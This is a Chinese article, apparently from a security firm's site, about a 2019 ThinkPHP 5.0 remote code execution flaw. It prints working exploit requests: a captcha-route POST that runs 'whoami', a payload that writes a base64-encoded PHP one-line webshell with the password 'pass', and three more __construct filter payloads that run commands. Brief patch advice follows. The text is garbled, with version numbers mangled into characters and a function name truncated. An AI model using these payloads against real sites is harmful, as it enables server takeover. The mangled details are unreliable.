公司网站有漏洞被入侵该怎么解决

2019年1月14日消息，thinkphp又被爆出致命漏洞，能够直接远程代码执行，getshell提权写入网站木马到网站根目录，甚至直接提权到服务器，该漏洞影响版本ThinkPHP 5.0、ThinkPHP 5.0.十、ThinkPHP5.0.十二、ThinkPHP5.0.1三、ThinkPHP5.0.2三、thinkphp 5.0.22版本。

攻击者能够伪造远程恶意代码，对服务器进行post提交数据来利用漏洞，该漏洞产生的缘由是继上次2019元旦先后爆出的网站漏洞后，又一次的致命漏洞。在thinkphp目录下的library文件夹下的think\request.php代码。以下图所示：

从上述代码中能够看出整个代码写的流程，首先打开网站会从app.php代码里将请求的网站地址使用check来进行解析，而后再通过patch类型对其进行深度的赋值.而后可使用post方式提交数据到_method函数当中去，框架会对进行判断，而后对其调用传入的参数值，通过整个代码的循坏以及传入，就能够致使request的值给覆盖掉，从而产生远程代码执行，咱们来构造恶意的代码，看看漏洞是如何使用的。

post地址：anquan/public/index.php?s=captcha

POST内容：c=system&f=whoami&_method=filter

直接远程提交过去就会执行咱们的命令 whoami。查看返回的post数据就能够看到咱们要看的

信息。

在总体的全部版本中测试，thinkphp必须开启debug模式才能够写入webshell，写入的执行代码是：_method=construct&filter[]=assert&filter[]=file_put_contents('0.php',_decode

('JTNDJTI1ZXZhbCUyMHJlcXVlc3QlMjAlMjglMjJwYXNzJTIyJTI5JTI1JTNF'))&server=-1 写入的是一句话木马，链接密码是pass.

有些低版本的网站，能够不使用captcha参数也但是执行远程代码，代码以下：_method=__construct&filter[]=system&method=GET&get[]=whoami

_method=__construct&filter[]=assert&server[]=phpinfo&get[]=phpinfo

_method=__construct&filter[]=call_user_func&server[]=phpinfo&get[]=phpinfo

以上三个都是能够执行远程代码的。

关于thinkphp漏洞的修复建议：

尽快升级thinkphp到最新版本，有一些网站可能不方便升级，也能够对代码的文件进行修复，漏洞代码是library/think/Request.php对该代码的526行，527行进行添加设置白名单机制，对请求过来的数据，以及接收的数据进行安全限制。if (in_array($method, ['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])) {$this->method = $method,网站程序代码的安全很重要，若是网站使用了开源的CMS系统代码，不懂程序技术的话，网站会常常被黑客攻击，若是本身懂程序，那就能够本身针对代码的漏洞进行漏洞修复，不懂的话，就请专业的网站安全公司来完善一下程序上的某些代码漏洞，国内像SINE安全、绿盟安全、启明星辰都是比较专业的安全公司，不少黑客之因此能植入木马病毒，就是抓住了这些网站代码上的漏洞。